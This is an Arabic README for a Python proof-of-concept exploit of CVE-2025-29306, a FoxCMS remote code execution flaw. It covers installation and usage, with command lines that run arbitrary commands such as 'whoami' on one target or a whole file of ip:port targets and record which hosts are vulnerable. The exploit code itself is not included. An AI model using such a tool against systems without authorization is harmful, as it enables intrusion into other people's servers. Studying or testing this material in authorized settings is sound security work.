
إثبات المفهوم (PoC) لثغرة CVE-2025-29306، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في FoxCMS. يقوم هذا السكربت المكتوب بلغة Python بفحص هدف واحد أو أهداف متعددة، وينفّذ الأوامر، ويُبلغ عن المضيفين المعرّضين للخطر.
أداة استغلال مكتوبة بلغة Python لثغرة CVE-2025-29306، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في FoxCMS. تتيح هذه الأداة اختبار هدف واحد أو فحص عدة مضيفين دفعة واحدة.
git clone https://github.com/mattb709/CVE-2025-29306-PoC-FoxCMS-RCE
.git
cd CVE-2025-29306-PoC-FoxCMS-RCE
pip install -r requirements.txt
requestsbeautifulsoup4argparseلتثبيت المتطلبات باستخدام:
pip install requests beautifulsoup4
usage: foxcms_rce.py [-h] -c COMMAND (-t TARGET | -f TARGETS_FILE)
CVE-2025-29306 Exploit Checker
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Command to execute on vulnerable hosts
-t TARGET, --target TARGET
Single target in the format ip:port
-f TARGETS_FILE, --targets-file TARGETS_FILE
File containing multiple targets, one per line, in the format ip:port
python CVE-2025-29306-PoC -t 192.168.1.100:8080 -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami" > results.txt
يجب أن يحتوي ملف الأهداف على هدف واحد في كل سطر بالتنسيق:
ip:port
مثال:
192.168.1.100:80
10.10.10.5:443
172.16.32.15:8080
يوفر البرنامج النصي ما يلي:
foxcms_rce_results.txt
هذه الأداة مخصصة لأغراض تعليمية والاختبارات المصرح بها فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
رخصة MIT - راجع ملف LICENSE للتفاصيل